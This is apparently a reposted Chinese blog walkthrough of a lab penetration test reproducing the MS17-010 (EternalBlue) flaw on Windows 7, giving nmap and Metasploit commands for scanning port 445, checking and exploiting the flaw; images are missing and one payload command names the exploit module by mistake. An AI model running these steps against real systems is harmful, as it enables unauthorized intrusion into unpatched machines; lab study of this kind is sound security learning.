其他分享
首页 > 其他分享> > remote pc ms17-010

remote pc ms17-010

作者:互联网

我们将使用以下工具对此进行演示

注意:此实验仅用于教育目的,任何非法活动概不负责。

测试目的:

通过实施针对性的渗透测试,发现win7系统的安全漏洞,复现ms17-010,熟悉渗透测试流程。

测试范围:

本次测试的范围详细如下:

系统名称 未知
测试时间 2020.10.24
测试工具 kali linux
说明 本次渗透测试过程中使用网络环境为私有内网

 

 

 

 

 

 

 

 

数据来源:

通过漏洞扫描和手动分析获取相关数据。

全网搜索445端口

nmap -p 445 192.168.31.0/24

 

 

 

 

 

 搜索ms17-010

 

 

auxiliary模块 检查漏洞: 

use 1 或者use auxiliary/scanner/smb/smb_ms17_010 

 

 

发现漏洞存在 

 

 

 

渗透利用:

搜索ms17-010 :search ms17-010

使用exploit永恒之蓝设置参数: use 2 或exploit/windows/smb/ms17-010_eternalblue

设置攻击负载:set payload 2 或者 set payload exploit/windows/smb/ms17-010_eternalblue

 

 

 

 

 攻击成功:

 

 

 

 

 

 

 

后渗透:

 

 

 

 

 

 

 

标签:渗透,010,pc,exploit,ms17,测试,smb
来源: https://www.cnblogs.com/donglian1/p/13871059.html